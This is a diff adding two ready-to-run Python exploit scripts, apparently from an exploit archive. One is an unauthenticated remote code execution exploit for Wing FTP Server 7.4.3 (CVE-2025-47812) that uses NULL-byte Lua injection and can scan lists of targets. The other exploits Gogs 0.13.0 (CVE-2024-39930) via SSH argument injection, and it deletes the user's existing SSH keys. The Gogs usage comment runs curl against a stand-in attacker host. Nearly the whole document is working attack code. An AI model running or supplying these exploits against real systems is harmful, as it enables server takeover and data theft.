CERTCC
diff --git a/‎exploits/multiple/remote/52347.py‎
Lines changed: 179 additions & 0 deletions b/‎exploits/multiple/remote/52347.py‎
Lines changed: 179 additions & 0 deletions
diff --git a/‎exploits/multiple/remote/52348.py‎
Lines changed: 194 additions & 0 deletions b/‎exploits/multiple/remote/52348.py‎
Lines changed: 194 additions & 0 deletions
@@ -0,0 +1,179 @@
+# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
+# CVE: CVE-2025-47812
+# Date: 2025-06-30
+# Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r)
+# Vendor Homepage: https://www.wftpserver.com/
+# Version: Wing FTP Server <= 7.4.3
+# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges)
+
+# Description:
+# Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE)
+# flaw (CVE-2025-47812). This vulnerability arises from improper handling of NULL bytes in the 'username'
+# parameter during login, leading to Lua code injection into session files. These maliciously crafted
+# session files are subsequently executed when authenticated functionalities (e.g., /dir.html) are accessed,
+# resulting in arbitrary command execution on the server with elevated privileges (root on Linux, SYSTEM on Windows).
+# The exploit leverages a discrepancy between the string processing in c_CheckUser() (which truncates at NULL)
+# and the session creation logic (which uses the full unsanitized username).
+
+# Proof-of-Concept (Python):
+# The provided Python script automates the exploitation process.
+# It injects a NULL byte followed by Lua code into the username during a POST request to loginok.html.
+# Upon successful authentication (even anonymous), a UID cookie is returned.
+# A subsequent GET request to dir.html using this UID cookie triggers the execution of the injected Lua code,
+# leading to RCE.
+
+
+import requests
+import re
+import argparse
+
+# ANSI color codes
+RED = "\033[91m"
+GREEN = "\033[92m"
+RESET = "\033[0m"
+
+def print_green(text):
+    print(f"{GREEN}{text}{RESET}")
+
+def print_red(text):
+    print(f"{RED}{text}{RESET}")
+
+def run_exploit(target_url, command, username="anonymous", verbose=False):
+    login_url = f"{target_url}/loginok.html"
+
+    login_headers = {
+        "Host": target_url.split('//')[1].split('/')[0],
+        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+        "Accept-Language": "en-US,en;q=0.5",
+        "Accept-Encoding": "gzip, deflate, br",
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Origin": target_url,
+        "Connection": "keep-alive",
+        "Referer": f"{target_url}/login.html?lang=english",
+        "Cookie": "client_lang=english",
+        "Upgrade-Insecure-Requests": "1",
+        "Priority": "u=0, i"
+    }
+
+
+    from urllib.parse import quote
+    encoded_username = quote(username)
+
+    payload = (
+        f"username={encoded_username}%00]]%0dlocal+h+%3d+io.popen(\"{command}\")%0dlocal+r+%3d+h%3aread(\"*a\")"
+        "%0dh%3aclose()%0dprint(r)%0d--&password="
+    )
+
+    if verbose:
+        print_green(f"[+] Sending POST request to {login_url} with command: '{command}' and username: '{username}'")
+
+    try:
+        login_response = requests.post(login_url, headers=login_headers, data=payload, timeout=10)
+        login_response.raise_for_status()
+    except requests.exceptions.RequestException as e:
+        print_red(f"[-] Error sending POST request to {login_url}: {e}")
+        return False
+
+    set_cookie = login_response.headers.get("Set-Cookie", "")
+    match = re.search(r'UID=([^;]+)', set_cookie)
+
+    if not match:
+        print_red("[-] UID not found in Set-Cookie. Exploit might have failed or response format changed.")
+        return False
+
+    uid = match.group(1)
+    if verbose:
+        print_green(f"[+] UID extracted: {uid}")
+
+    dir_url = f"{target_url}/dir.html"
+    dir_headers = {
+        "Host": login_headers["Host"],
+        "User-Agent": login_headers["User-Agent"],
+        "Accept": login_headers["Accept"],
+        "Accept-Language": login_headers["Accept-Language"],
+        "Accept-Encoding": login_headers["Accept-Encoding"],
+        "Connection": "keep-alive",
+        "Cookie": f"UID={uid}",
+        "Upgrade-Insecure-Requests": "1",
+        "Priority": "u=0, i"
+    }
+
+    if verbose:
+        print_green(f"[+] Sending GET request to {dir_url} with UID: {uid}")
+
+    try:
+        dir_response = requests.get(dir_url, headers=dir_headers, timeout=10)
+        dir_response.raise_for_status()
+    except requests.exceptions.RequestException as e:
+        print_red(f"[-] Error sending GET request to {dir_url}: {e}")
+        return False
+
+    body = dir_response.text
+    clean_output = re.split(r'<\?xml', body)[0].strip()
+
+    if verbose:
+        print_green("\n--- Command Output ---")
+        print(clean_output)
+        print_green("----------------------")
+    else:
+        if clean_output:
+            print_green(f"[+] {target_url} is vulnerable!")
+        else:
+            print_red(f"[-] {target_url} is NOT vulnerable.")
+
+    return bool(clean_output)
+
+def main():
+    parser = argparse.ArgumentParser(description="Exploit script for command injection via login.html.")
+    parser.add_argument("-u", "--url", type=str,
+                        help="Target URL (e.g., http://192.168.134.130). Required if -f not specified.")
+    parser.add_argument("-f", "--file", type=str,
+                        help="File containing list of target URLs (one per line).")
+    parser.add_argument("-c", "--command", type=str,
+                        help="Custom command to execute. Default: whoami. If specified, verbose output is enabled automatically.")
+    parser.add_argument("-v", "--verbose", action="store_true",
+                        help="Show full command output (verbose mode). Ignored if -c is used since verbose is auto-enabled.")
+    parser.add_argument("-o", "--output", type=str,
+                        help="File to save vulnerable URLs.")
+    parser.add_argument("-U", "--username", type=str, default="anonymous",
+                        help="Username to use in the exploit payload. Default: anonymous")
+
+    args = parser.parse_args()
+
+    if not args.url and not args.file:
+        parser.error("Either -u/--url or -f/--file must be specified.")
+
+    command_to_use = args.command if args.command else "whoami"
+    verbose_mode = True if args.command else args.verbose
+
+    vulnerable_sites = []
+
+    targets = []
+    if args.file:
+        try:
+            with open(args.file, 'r') as f:
+                targets = [line.strip() for line in f if line.strip()]
+        except Exception as e:
+            print_red(f"[-] Could not read target file '{args.file}': {e}")
+            return
+    else:
+        targets = [args.url]
+
+    for target in targets:
+        print(f"\n[*] Testing target: {target}")
+        is_vulnerable = run_exploit(target, command_to_use, username=args.username, verbose=verbose_mode)
+        if is_vulnerable:
+            vulnerable_sites.append(target)
+
+    if args.output and vulnerable_sites:
+        try:
+            with open(args.output, 'w') as out_file:
+                for site in vulnerable_sites:
+                    out_file.write(site + "\n")
+            print_green(f"\n[+] Vulnerable sites saved to: {args.output}")
+        except Exception as e:
+            print_red(f"[-] Could not write to output file '{args.output}': {e}")
+
+if __name__ == "__main__":
+    main()
@@ -0,0 +1,194 @@
+# Exploit Title: gogs 0.13.0 - Remote Code Execution (RCE)
+# Date: 27th June, 2025
+# Exploit Author: Ardayfio Samuel Nii Aryee
+# Software link: https://github.com/gogs/gogs.git
+# Version: gogs <=0.13.0
+# Tested on: Ubuntu
+# CVE: CVE-2024-39930
+
+
+# ===============================
+# Example Usage:
+# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "touch /tmp/pwned"
+# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "curl http://atacker.com" --ssh-port 2222
+# ===============================
+
+import requests
+import paramiko
+import base64
+import random
+import string
+import sys
+import argparse
+from urllib.parse import urlparse
+
+API_BASE_URL = ""
+
+def generate_random_string(length=8, charset=None):
+    if charset is None:
+        charset = string.ascii_letters + string.digits
+    return ''.join(random.choices(charset, k=length))
+
+def make_headers(token=None, basic_auth=None):
+    headers = {"Content-Type": "application/json"}
+    if token:
+        headers["Authorization"] = f"token {token}"
+    elif basic_auth:
+        b64 = base64.b64encode(basic_auth.encode()).decode()
+        headers["Authorization"] = f"Basic {b64}"
+    return headers
+
+def http_post(path, json=None, headers=None):
+    url = f"{API_BASE_URL}{path}"
+    response = requests.post(url, json=json, headers=headers)
+    response.raise_for_status()
+    return response
+
+def http_get(path, headers=None):
+    url = f"{API_BASE_URL}{path}"
+    response = requests.get(url, headers=headers)
+    response.raise_for_status()
+    return response
+
+def http_delete(path, headers=None):
+    url = f"{API_BASE_URL}{path}"
+    response = requests.delete(url, headers=headers)
+    response.raise_for_status()
+    return response
+
+def obtain_api_token(username, password):
+    auth = f"{username}:{password}"
+    headers = make_headers(basic_auth=auth)
+    data = {"name": generate_random_string()}
+
+    try:
+        response = http_post(f"/users/{username}/tokens", json=data, headers=headers)
+        token = response.json()['sha1']
+        print(f"[+] API Token Acquired: {token}")
+        return token
+    except Exception as e:
+        print(f"[!] Failed to obtain API token: {e}")
+        sys.exit(1)
+
+def create_repo(token):
+    repo_name = generate_random_string()
+    headers = make_headers(token=token)
+    data = {
+        "name": repo_name,
+        "description": "Auto-created repository",
+        "private": False
+    }
+
+    try:
+        response = http_post("/user/repos", json=data, headers=headers)
+        full_name = response.json()['full_name']
+        print(f"[+] Repository Created: {full_name}")
+        return full_name
+    except Exception as e:
+        print(f"[!] Failed to create repository: {e}")
+        sys.exit(1)
+
+def delete_existing_ssh_keys(token):
+    headers = make_headers(token=token)
+    try:
+        response = http_get("/user/keys", headers=headers)
+        keys = response.json()
+        for key in keys:
+            key_id = key['id']
+            http_delete(f"/user/keys/{key_id}", headers=headers)
+            print(f"[+] Deleted SSH Key ID: {key_id}")
+    except Exception as e:
+        print(f"[!] Failed to delete existing SSH keys: {e}")
+        sys.exit(1)
+
+def add_ssh_key(public_key_path, token):
+    delete_existing_ssh_keys(token)
+
+    try:
+        with open(public_key_path, 'r') as f:
+            key = f.read()
+    except Exception as e:
+        print(f"[!] Failed to read public key file: {e}")
+        sys.exit(1)
+
+    headers = make_headers(token=token)
+    data = {
+        "title": generate_random_string(),
+        "key": key
+    }
+
+    try:
+        response = http_post("/user/keys", json=data, headers=headers)
+        print(f"[+] SSH Key Added: {response.status_code}")
+    except Exception as e:
+        print(f"[!] Failed to add SSH key: {e}")
+        sys.exit(1)
+
+def exploit(ssh_user, ssh_host, ssh_port, private_key_path, repo_path, command):
+    try:
+        key = paramiko.RSAKey.from_private_key_file(private_key_path)
+    except Exception as e:
+        print(f"[!] Failed to load SSH key: {e}")
+        sys.exit(1)
+
+    try:
+        client = paramiko.SSHClient()
+        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+        client.connect(hostname=ssh_host, port=int(ssh_port), username=ssh_user, pkey=key)
+
+        session = client.get_transport().open_session()
+
+        print("[+] Executing command...... ")
+        session.set_environment_variable("--split-string", command)
+        session.exec_command(f"git-upload-pack {repo_path}")
+
+        stdout = session.makefile('rb', 1024)
+        stderr = session.makefile_stderr('rb', 1024)
+
+        print("STDERR:", stderr.read().decode())
+        print("STDOUT:", stdout.read().decode())
+
+        session.close()
+        client.close()
+    except Exception as e:
+        print(f"[!] Error: {e}")
+        sys.exit(1)
+
+def main():
+    global API_BASE_URL
+
+    parser = argparse.ArgumentParser(description="Exploit Gogs SSH argument injection (CVE-2024-39930)")
+    parser.add_argument("url", help="Gogs application URL (e.g., http://skillforge.lab:3000)")
+    parser.add_argument("auth", help="Gogs credentials in the format username:password")
+    parser.add_argument("private_key", help="Path to private SSH key")
+    parser.add_argument("public_key", help="Path to public SSH key")
+    parser.add_argument("command", help="Command to execute remotely")
+    parser.add_argument("--ssh-port", type=int, default=None, help="Optional: custom SSH port to use")
+    args = parser.parse_args()
+
+    parsed_url = urlparse(args.url)
+    API_BASE_URL = f"{parsed_url.scheme}://{parsed_url.netloc}/api/v1"
+    ssh_host = parsed_url.hostname
+    ssh_port = args.ssh_port if args.ssh_port else (parsed_url.port or 22)
+
+    try:
+        username, password = args.auth.split(":")
+    except ValueError:
+        print("[!] Invalid format for auth argument")
+        sys.exit(1)
+
+    token = obtain_api_token(username, password)
+    repo_path = create_repo(token)
+    add_ssh_key(args.public_key, token)
+
+    exploit(
+        ssh_user=username,
+        ssh_host=ssh_host,
+        ssh_port=ssh_port,
+        private_key_path=args.private_key,
+        repo_path=repo_path,
+        command=args.command
+    )
+
+if __name__ == "__main__":
+    main()